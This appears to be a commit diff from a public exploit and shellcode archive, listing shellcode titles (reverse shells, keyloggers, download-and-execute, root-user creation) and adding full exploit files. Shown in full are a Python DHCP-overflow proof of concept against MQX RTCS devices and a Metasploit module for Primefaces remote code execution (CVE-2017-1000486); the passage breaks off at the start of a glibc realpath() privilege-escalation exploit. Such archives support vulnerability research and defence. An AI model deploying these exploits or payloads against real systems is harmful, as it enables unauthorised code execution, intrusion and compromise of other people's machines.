Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes)
Windows/x86 (.Net Framework) - Execute Native x86 Shellcode

Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes)
Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)

Linux/x86-64 - execve() XOR Encoded Shellcode (84 bytes)
Linux/x86-64 - execve() + XOR Encoded Shellcode (84 bytes)

Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)
Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)
Windows x86 - system(_systeminfo_) Shellcode (224 bytes)
Windows XP < 10 - Download File + Execute Shellcode
Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)
Windows/x86 - system(systeminfo) Shellcode (224 bytes)
Windows (XP < 10) - Download File + Execute Shellcode
Windows/x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)

Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:10)  Xterm Shell Shellcode (68 bytes)
Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)
Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)
Windows/x86 (7) - localhost Port Scanner Shellcode (556 bytes)
Linux/x86 - Bind TCP/UDP (98/TCP + UDP) Netcat Shell Shellcode (44/52 bytes)
Windows x86 - MessageBoxA Shellcode (242 bytes)
Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)
Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{shadow_passwd} Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{shadow_passwd} Shellcode (273 bytes)
Windows/x86 - MessageBoxA Shellcode (242 bytes)
Windows/x86 - CreateProcessA cmd.exe Shellcode (253 bytes)
Windows/x86 - InitiateSystemShutdownA() Shellcode (599 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)

Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
Linux/x86-64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)

OSX/PPC - Stager Sock Find MSG_PEEK Shellcode
OSX/PPC - Stager Sock Find MSG_PEEK + Null-Free Shellcode

OSX/PPC - execve(/bin/sh) Shellcode
OSX/PPC - execve(/bin/sh) + Null-Free Shellcode

Linux/x86 - socket-proxy Shellcode (372 bytes) (Generator)
Linux/x86 - Socket-proxy Shellcode (372 bytes) (Generator)
Linux/x86 - rmdir(_/tmp/willdeleted_) Shellcode (41 bytes)
Linux/x86 - setdomainname(_th1s s3rv3r h4s b33n h1j4ck3d !!_) Shellcode (58 bytes)
Linux/x86 - rmdir(/tmp/willdeleted) Shellcode (41 bytes)
Linux/x86 - setdomainname(th1s s3rv3r h4s b33n h1j4ck3d !!) Shellcode (58 bytes)

Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (5)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)
Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) Shellcode (103 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell Shellcode (72 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (65 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method Shellcode (89 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell Shellcode (73 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
Linux/x86 - Egghunter Shellcode (38 bytes)
Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)
Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)
Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) + Null-Free Shellcode (103 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell + Null-Free Shellcode (72 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (65 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method + Null-Free Shellcode (89 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + Null-Free Shellcode (73 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)
Linux/x86 - Egghunter (0x50905090) + Null-Free Shellcode (38 bytes)
Linux/x86 - execve(/bin/sh) + Null-Free Shellcode (21 bytes) (6)
Linux/x86 - Read /etc/passwd file + Null-Free Shellcode (51 bytes)
Linux/x86 - Reboot() + Mutated + Null-Free Shellcode (55 bytes)
Linux/x86 - Fork Bomb + Mutated + Null-Free Shellcode (15 bytes)
Linux/x86 - execve wget + Mutated + Null-Free Shellcode (96 bytes)
Linux/x86 - execve(/bin/sh) + Uzumaki Encoded + Null-Free Shellcode (50 bytes)
Linux/x86 - Uzumaki Encryptor Shellcode (Generator)
Linux/x86 - Bind TCP (31337/TCP) Shell Shellcode (108 bytes)
Linux/x86 - /proc/sys/net/ipv4/ip_forward 0 + exit() Shellcode (83 bytes)
Linux/x86 - Egghunter (0x5090) Shellcode (38 bytes)
Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (30 bytes)
Linux/x86 - Bind TCP Shell Shellcode (112 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:12345/TCP) cat /etc/passwd Shellcode (111 bytes)
Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + execute Shellcode (108 bytes)
Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes)
Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes)
Linux/x86 - shift-bit execve() Encoder Shellcode (114 bytes)
Linux/x86 - execve() Using  JMP-FSTENV Shellcode (67 bytes)
Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)
Linux/x86 - shutdown -h now Shellcode (56 bytes)
Linux/x86 - Bind TCP (1337/TCP) Shell Shellcode (89 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:1337/TCP) Shell Shellcode (74 bytes)
Linux/x86 - setreuid() + execve(/usr/bin/python) Shellcode (54 bytes)
Linux/x86 - execve() + ROT-7  Shellcode (Encoder/Decoder)  (74 bytes)
Windows/x86 (NT/XP/2000/2003) - Bind TCP (8721/TCP) Shell Shellcode (356 bytes)
Windows/x86 (2000) - Reverse TCP (192.168.0.247:8721/TCP) Connect + Vampiric Import Shellcode (179 bytes)
Windows/x86 - Create Admin User (X) Shellcode (304 bytes)
Windows/x86 (XP SP3) (French) - Sleep 90 Seconds Shellcode (14 bytes)
Windows/x86 (XP Professional SP2) (English) - Wordpad Shellcode (15 bytes)
Windows/x86 (XP Professional SP2) - calc Shellcode (57 bytes)
Windows/x86 (XP Professional SP3) (French) - calc.exe Shellcode (31 bytes)
Windows/x86 - Download File (http://skypher.com/dll) + LoadLibrary + Null-Free Shellcode (164 bytes)
Windows/x86 - calc.exe + Null-Free Shellcode (100 bytes)
Windows/x86 - Message Box + Null-Free Shellcode (140 bytes)
Windows/x86 (XP SP3) (Turkish) - MessageBoxA Shellcode (109 bytes)
Windows/x86 (XP SP3) (Turkish) - calc.exe Shellcode (53 bytes)
Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (52 bytes)
Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (42 bytes)
Windows/x86 (XP SP3) (English) - calc Shellcode (16 bytes)
Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes)
Windows/x86-64 - cmd.exe WinExec() Shellcode (93 bytes)
Windows/x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)
Windows/x86-64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)
Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)
Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)
Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution Null-Free Shellcode (72 bytes)
Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)
Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)
Linux/x86-64 - mkdir Shellcode (25 bytes)
Windows/x86-64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)
Linux/x86 - Reverse TCP Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)
Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes)
Windows/x86-64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)
Windows/x86-64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)
Linux/x86-64 - mkdir() Shellcode (25 bytes)

Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)
Windows/x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)
Linux/x86-64 - Egghunter Shellcode (38 bytes)
Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)
Linux/x86-64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)
Windows/x86 - Executable Directory Search + Null-Free Shellcode (130 bytes)

Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)
Windows/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)

Windows x86 - Hide Console Window Shellcode (182 bytes)
Windows/x86 - Hide Console Window Shellcode (182 bytes)

Linux/ARM - chmod(_/etc/passwd__ 0777) Shellcode (39 bytes)
Linux/ARM - chmod( /etc/passwd 0777) Shellcode (39 bytes)

Linux/SPARC - setreuid(0_0) + standard execve() Shellcode (72 bytes)
Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes)

Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes)
Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) +  Egghunter Using sys_access() Shellcode (49 bytes)

Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes)
Linux/x86 - exceve(/bin/sh) + Encoded Shellcode (44 bytes)

Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)

Windows 10 x64 - Egghunter Shellcode (45 bytes)
Windows/x86-64 (10) - Egghunter Shellcode (45 bytes)

Linux/x86 - Egghunter Shellcode (18 bytes)
Linux/x86 - Egghunter (0x50905090) + /bin/sh Shellcode (18 bytes)

Windows x86/x64 - cmd.exe Shellcode (718 bytes)
Windows/x86-64 / x86 - cmd.exe Shellcode (718 bytes)

Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)
Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) + XOR Encoded Shellcode (66 bytes)

Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (4)

Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)
Linux/x86-64 - mkdir(evil) Shellcode (30 bytes)

Windows x64 - API Hooking Shellcode (117 bytes)
Windows/x86-64 - API Hooking Shellcode (117 bytes)
---
 exploits/cgi/webapps/922.pl                   |   2 +-
 exploits/hardware/dos/43776.py                |  63 ++
 exploits/java/webapps/43733.rb                | 156 +++
 exploits/linux/local/1215.c                   |   2 +-
 exploits/linux/local/43775.c                  | 977 ++++++++++++++++++
 exploits/multiple/remote/1292.pm              |   2 +-
 exploits/php/webapps/1014.txt                 |  10 +-
 exploits/php/webapps/1367.php                 |   2 +-
 exploits/php/webapps/1457.txt                 |   2 +-
 exploits/windows/remote/1224.html             |   4 +-
 exploits/windows/remote/693.c                 |   2 +-
 files_exploits.csv                            |  51 +-
 files_shellcodes.csv                          | 472 +++++----
 .../{windows_x86 => generator}/14014.pl       |   0
 shellcodes/generator/43741.py                 | 154 +++
 shellcodes/linux_x86/36921.c                  |   2 +-
 shellcodes/linux_x86/43701.c                  |  32 -
 shellcodes/linux_x86/43734.c                  |  86 ++
 shellcodes/linux_x86/43735.c                  |  70 ++
 shellcodes/linux_x86/43736.c                  |  74 ++
 shellcodes/linux_x86/43737.c                  |  75 ++
 shellcodes/linux_x86/43738.c                  |  70 ++
 shellcodes/linux_x86/43739.c                  |  78 ++
 shellcodes/linux_x86/43740.c                  |  82 ++
 shellcodes/linux_x86/43742.c                  | 100 ++
 shellcodes/linux_x86/43743.c                  |  69 ++
 shellcodes/linux_x86/43744.c                  |  59 ++
 shellcodes/linux_x86/43745.c                  |  41 +
 shellcodes/linux_x86/43746.c                  |  90 ++
 shellcodes/linux_x86/43747.c                  |  98 ++
 shellcodes/linux_x86/43748.c                  |  95 ++
 shellcodes/linux_x86/43749.asm                |  41 +
 shellcodes/linux_x86/43750.asm                |  52 +
 shellcodes/linux_x86/43751.asm                |  75 ++
 shellcodes/linux_x86/43752.asm                |  15 +
 shellcodes/linux_x86/43753.c                  |  48 +
 shellcodes/linux_x86/43754.c                  |  54 +
 shellcodes/linux_x86/43755.c                  |  75 ++
 shellcodes/linux_x86/43756.c                  |  62 ++
 shellcodes/linux_x86/43757.c                  |  51 +
 shellcodes/linux_x86/43758.txt                | 133 +++
 shellcodes/windows_x86/43759.asm              | 239 +++++
 shellcodes/windows_x86/43760.asm              | 135 +++
 shellcodes/windows_x86/43761.asm              | 200 ++++
 shellcodes/windows_x86/43762.c                |  22 +
 shellcodes/windows_x86/43763.txt              |  71 ++
 shellcodes/windows_x86/43764.c                |  45 +
 shellcodes/windows_x86/43765.c                |  26 +
 shellcodes/windows_x86/43766.asm              | 101 ++
 shellcodes/windows_x86/43767.asm              |  63 ++
 shellcodes/windows_x86/43768.asm              |  81 ++
 shellcodes/windows_x86/43769.c                |  32 +
 shellcodes/windows_x86/43770.c                |  29 +
 shellcodes/windows_x86/43771.c                |  29 +
 shellcodes/windows_x86/43772.c                |  51 +
 shellcodes/windows_x86/43773.c                |  24 +
 shellcodes/windows_x86/43774.c                |  19 +
 57 files changed, 4507 insertions(+), 286 deletions(-)
 create mode 100755 exploits/hardware/dos/43776.py
 create mode 100755 exploits/java/webapps/43733.rb
 create mode 100644 exploits/linux/local/43775.c
 rename shellcodes/{windows_x86 => generator}/14014.pl (100%)
 create mode 100755 shellcodes/generator/43741.py
 delete mode 100644 shellcodes/linux_x86/43701.c
 create mode 100644 shellcodes/linux_x86/43734.c
 create mode 100644 shellcodes/linux_x86/43735.c
 create mode 100644 shellcodes/linux_x86/43736.c
 create mode 100644 shellcodes/linux_x86/43737.c
 create mode 100644 shellcodes/linux_x86/43738.c
 create mode 100644 shellcodes/linux_x86/43739.c
 create mode 100644 shellcodes/linux_x86/43740.c
 create mode 100644 shellcodes/linux_x86/43742.c
 create mode 100644 shellcodes/linux_x86/43743.c
 create mode 100644 shellcodes/linux_x86/43744.c
 create mode 100644 shellcodes/linux_x86/43745.c
 create mode 100644 shellcodes/linux_x86/43746.c
 create mode 100644 shellcodes/linux_x86/43747.c
 create mode 100644 shellcodes/linux_x86/43748.c
 create mode 100644 shellcodes/linux_x86/43749.asm
 create mode 100644 shellcodes/linux_x86/43750.asm
 create mode 100644 shellcodes/linux_x86/43751.asm
 create mode 100644 shellcodes/linux_x86/43752.asm
 create mode 100644 shellcodes/linux_x86/43753.c
 create mode 100644 shellcodes/linux_x86/43754.c
 create mode 100644 shellcodes/linux_x86/43755.c
 create mode 100644 shellcodes/linux_x86/43756.c
 create mode 100644 shellcodes/linux_x86/43757.c
 create mode 100644 shellcodes/linux_x86/43758.txt
 create mode 100644 shellcodes/windows_x86/43759.asm
 create mode 100644 shellcodes/windows_x86/43760.asm
 create mode 100644 shellcodes/windows_x86/43761.asm
 create mode 100644 shellcodes/windows_x86/43762.c
 create mode 100644 shellcodes/windows_x86/43763.txt
 create mode 100644 shellcodes/windows_x86/43764.c
 create mode 100644 shellcodes/windows_x86/43765.c
 create mode 100644 shellcodes/windows_x86/43766.asm
 create mode 100644 shellcodes/windows_x86/43767.asm
 create mode 100644 shellcodes/windows_x86/43768.asm
 create mode 100644 shellcodes/windows_x86/43769.c
 create mode 100644 shellcodes/windows_x86/43770.c
 create mode 100644 shellcodes/windows_x86/43771.c
 create mode 100644 shellcodes/windows_x86/43772.c
 create mode 100644 shellcodes/windows_x86/43773.c
 create mode 100644 shellcodes/windows_x86/43774.c

diff --git a/exploits/cgi/webapps/922.pl b/exploits/cgi/webapps/922.pl
index c410d2a5d..61fe799bf 100755
--- a/exploits/cgi/webapps/922.pl
+++ b/exploits/cgi/webapps/922.pl
@@ -3,7 +3,7 @@
 ############################################################
 # Target - The Includer CGI <= 1.0                         #
 #                                                          #
-# Based on - http://www.milw0rm.com/id.php?id=862          #
+# Based on - http://www.milw0rm.com/id.php?id=862 (https://www.exploit-db.com/exploits/862/)          #
 #                                                          #
 # Info about bug - Stupid use "Open" function.             #
 #                                                          #
diff --git a/exploits/hardware/dos/43776.py b/exploits/hardware/dos/43776.py
new file mode 100755
index 000000000..935afc8cf
--- /dev/null
+++ b/exploits/hardware/dos/43776.py
@@ -0,0 +1,63 @@
+#!/usr/bin/python3
+"""PoC for MQX RTCS code execution via DHCP options overflow.
+
+This is just a quick hack to prove the vulnerability and was designed to run
+on a private network with the target device.
+"""
+
+import datetime
+import socket
+
+def main():
+    """Use a default valid DHCP packet to overwrite an event function pointer."""
+    execute_addr = 0xFFFFFFFF
+    exploit_pkt = bytearray.fromhex(' \
+                    02 01 06 00 a5 d3 0b 2f 00 00 80 00 00 00 00 00 \
+                    ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff \
+                    ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 00 00 00 00 00 00 00 63 82 53 63 \
+                    35 01 02 36 04 ff ff ff ff 01 04 ff ff ff 00 43 \
+                    98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
+                    00 00 00 00 00 ff ff ff ff ff')
+
+    exploit_pkt[0x195:0x199] = execute_addr.to_bytes(4, byteorder='big')
+
+    recv_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+    recv_sock.bind(('', 67))
+
+    send_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+    send_sock.bind(('', 68))
+
+    send_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+    send_sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
+
+    while True:
+        print("{}: Waiting for DHCP packet...".format(datetime.datetime.now()))
+        # Transaction IDs need to match else RTCS will throw out the packet.
+        data = recv_sock.recvfrom(1024)[0]
+        exploit_pkt[4:8] = data[4:8]
+        send_sock.sendto(exploit_pkt, ('<broadcast>', 68))
+        print("{}: Transmitted 0x{:X} PC redirection packet.".format(
+            datetime.datetime.now(), execute_addr))
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/java/webapps/43733.rb b/exploits/java/webapps/43733.rb
new file mode 100755
index 000000000..875803ee2
--- /dev/null
+++ b/exploits/java/webapps/43733.rb
@@ -0,0 +1,156 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
+  def initialize(info = {})
+    super(update_info(info,
+    'Name'           => 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit',
+    'Description'    => %q{
+          This module exploits an expression language remote code execution flaw in the Primefaces JSF framework.
+          Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt.
+  },
+    'Author'         => [ 'Bjoern Schuette' ],
+    'License'        => MSF_LICENSE,
+    'References'     =>
+    [
+      ['CVE', 'CVE-2017-1000486'],
+      ['URL', 'http://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html'],
+      ['URL', 'https://cryptosense.com/weak-encryption-flaw-in-primefaces/'],
+      ['URL', 'http://schuette.se/2018/01/16/in-your-primeface/']
+    ],
+    'Privileged'     => true,
+    'Payload'        =>
+    {
+      'Compat'      =>
+      {
+      'PayloadType' => 'cmd'
+      }
+
+    },
+    'DefaultOptions' =>
+    {
+      'WfsDelay' => 30
+    },
+    'DisclosureDate' => 'Feb 15 2016',
+    'Platform'       => ['unix', 'bsd', 'linux', 'osx', 'win'],
+    'Arch'           => ARCH_CMD,
+    'Targets'        => [
+      [
+      'Universal', {
+      'Platform'   => ['unix', 'bsd', 'linux', 'osx', 'win'],
+      'Arch'       => [ ARCH_CMD ],
+      },
+      ],
+    ],
+    'DefaultTarget' => 0))
+
+    register_options([
+      Opt::RPORT(80),
+      OptString.new('PASSWORD', [ true , "The password to login", 'primefaces']),
+      OptString.new('TARGETURI', [true, 'The base path to primefaces', '/javax.faces.resource/dynamiccontent.properties.xhtml'])  ,
+      OptString.new('CMD', [ false , "Command to execute", '']),
+    ])
+  end
+
+  def encrypt_el(password, payload)
+
+    salt = [0xa9, 0x9b, 0xc8, 0x32, 0x56, 0x34, 0xe3, 0x03].pack('c*')
+    iterationCount = 19
+
+    cipher = OpenSSL::Cipher.new("DES")
+    cipher.encrypt
+    cipher.pkcs5_keyivgen password, salt, iterationCount
+
+    ciphertext = cipher.update payload
+    ciphertext << cipher.final
+    return ciphertext
+
+  end
+
+  def http_send_command(cmd, payloadEL)
+    uri = normalize_uri(target_uri.path)
+    encrypted_payload = encrypt_el(datastore['PASSWORD'], payloadEL)
+    encrypted_payload_base64 = Rex::Text.encode_base64(encrypted_payload)
+    encrypted_payload_base64_url_encoded = Rex::Text.uri_encode(encrypted_payload_base64)
+
+    # send the payload and execute command
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => uri,
+      'vars_post' => {
+      'pfdrt' => 'sc',
+      'ln'  => 'primefaces',
+      'pfdrid' => encrypted_payload_base64_url_encoded
+      }
+    })
+
+    if res.nil?
+      vprint_error("Connection timed out")
+      fail_with(Failure::Unknown, "Failed to trigger the Enter button")
+    end
+
+    if res && res.headers && (res.code == 302 || res.code == 200)
+      print_good("HTTP return code #{res.code}")
+    else
+      vprint_error(res.body)
+      fail_with(Failure::Unknown, "#{peer} - Unknown error during execution")
+    end
+    return res
+  end
+
+  def exploit
+    cmd=""
+    if not datastore['CMD'].empty?
+      cmd = datastore['CMD']
+    else
+      cmd = payload.encoded
+    end
+    payloadEL = '${facesContext.getExternalContext().getResponse().setContentType("text/plain;charset=\"UTF-8\"")}'
+    payloadEL << '${session.setAttribute("scriptfactory","".getClass().forName("javax.script.ScriptEngineManager").newInstance())}'
+    payloadEL << '${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}'
+    payloadEL << '${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}'
+    payloadEL << '${session.getAttribute("scriptengine").eval('
+    payloadEL << '"var os = java.lang.System.getProperty(\"os.name\");'
+    payloadEL << 'var proc = null;'
+    payloadEL << 'os.toLowerCase().contains(\"win\")? '
+    payloadEL << 'proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"cmd.exe\",\"/C\",\"%s\"]).start()' % cmd
+    payloadEL << ' : proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"%s\"]).start();' % cmd
+    payloadEL << 'var is = proc.getInputStream();'
+    payloadEL << 'var sc = new java.util.Scanner(is,\"UTF-8\"); var out = \"\";'
+    payloadEL << 'while(sc.hasNext()) {out += sc.nextLine()+String.fromCharCode(10);}print(out);")}'
+    payloadEL << '${facesContext.getExternalContext().getResponse().getWriter().flush()}'
+    payloadEL << '${facesContext.getExternalContext().getResponse().getWriter().close()}';
+
+    vprint_status("Attempting to execute: #{cmd}")
+    resp = http_send_command(cmd, payloadEL)
+    print_line(resp.body.to_s)
+    m = resp.body.to_s 
+    if m.empty?
+      print_error("This server may not be vulnerable")
+    end
+    return
+  end
+
+  def check
+    var_a = rand_text_alpha_lower(4)
+    payloadEL = "${facesContext.getExternalContext().setResponseHeader(\"primesecretchk\", %s" % var_a
+    res = http_send_command(var_a, payloadEL)
+    if res.headers
+      if res.headers["primesecretchk"] == #{var_a}
+        vprint_good("Victim evaluates EL expressions")
+        return Exploit::CheckCode::Vulnerable
+      end
+    else
+      vprint_error("Unable to determine due to a HTTP connection timeout")
+      return Exploit::CheckCode::Unknown
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/linux/local/1215.c b/exploits/linux/local/1215.c
index 11fd3cd08..7ba5479df 100644
--- a/exploits/linux/local/1215.c
+++ b/exploits/linux/local/1215.c
@@ -5,7 +5,7 @@
 #include <unistd.h>
 #include <stdlib.h>
 
-/* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 */
+/* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 (https://www.exploit-db.com/exploits/1169/) */
 char shellcode[]=
                  "\x31\xc0\x31\xdb\x50\x68\x2f\x2f"
                  "\x73\x68\x68\x2f\x62\x69\x6e\x89"
diff --git a/exploits/linux/local/43775.c b/exploits/linux/local/43775.c
new file mode 100644
index 000000000..2fc3e5786
--- /dev/null
+++ b/exploits/linux/local/43775.c
@@ -0,0 +1,977 @@
+/** This software is provided by the copyright owner "as is" and any
+ *  expressed or implied warranties, including, but not limited to,
+ *  the implied warranties of merchantability and fitness for a particular
+ *  purpose are disclaimed. In no event shall the copyright owner be
+ *  liable for any direct, indirect, incidential, special, exemplary or
+ *  consequential damages, including, but not limited to, procurement
+ *  of substitute goods or services, loss of use, data or profits or
+ *  business interruption, however caused and on any theory of liability,
+ *  whether in contract, strict liability, or tort, including negligence
+ *  or otherwise, arising in any way out of the use of this software,
+ *  even if advised of the possibility of such damage.
+ *
+ *  Copyright (c) 2018 halfdog <me (%) halfdog.net>
+ *  See https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/ for more information.
+ *
+ *  This tool exploits a buffer underflow in glibc realpath()
+ *  and was tested against latest release from Debian, Ubuntu
+ *  Mint. It is intended as demonstration of ASLR-aware exploitation
+ *  techniques. It uses relative binary offsets, that may be different
+ *  for various Linux distributions and builds. Please send me
+ *  a patch when you developed a new set of parameters to add
+ *  to the osSpecificExploitDataList structure and want to contribute
+ *  them.
+ *
+ *  Compile: gcc -o RationalLove RationalLove.c
+ *  Run: ./RationalLove
+ *
+ *  You may also use "--Pid" parameter, if you want to test the
+ *  program on already existing namespaced or chrooted mounts.
+ */
+
+#define _GNU_SOURCE
+#include <assert.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <limits.h>
+#include <poll.h>
+#include <sched.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mount.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <time.h>
+#include <unistd.h>
+
+
+#define UMOUNT_ENV_VAR_COUNT 256
+
+/** Dump that number of bytes from stack to perform anti-ASLR.
+ *  This number should be high enough to reproducible reach the
+ *  stack region sprayed with (UMOUNT_ENV_VAR_COUNT*8) bytes of
+ *  environment variable references but low enough to avoid hitting
+ *  upper stack limit, which would cause a crash.
+ */
+#define STACK_LONG_DUMP_BYTES 4096
+
+char *messageCataloguePreamble="Language: en\n"
+    "MIME-Version: 1.0\n"
